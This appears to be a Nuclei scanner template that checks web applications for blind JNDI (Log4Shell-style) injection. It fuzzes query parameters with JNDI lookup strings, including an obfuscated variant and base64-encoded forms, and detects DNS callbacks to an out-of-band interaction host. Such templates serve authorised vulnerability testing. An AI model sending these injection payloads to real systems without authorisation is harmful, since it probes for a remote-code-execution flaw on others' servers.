id: blind-jndi-via-dns

info:
  name: Blind JNDI via DNS Detection
  author: reewardius
  severity: high
  tags: blind,fuzzing

http:
  - method: GET
    path:
      - "{{BaseURL}}"
    
    payloads:
      jndi:
        - "${jndi:dns://{{interactsh-url}}"
        - "${lower:d}n${lower:s}://{{interactsh-url}}/abc"
        - "{{base64('${jndi:dns://{{interactsh-url}}')}}"
        - "{{base64('dns://{{interactsh-url}}')}}"
        
    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{jndi}}"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
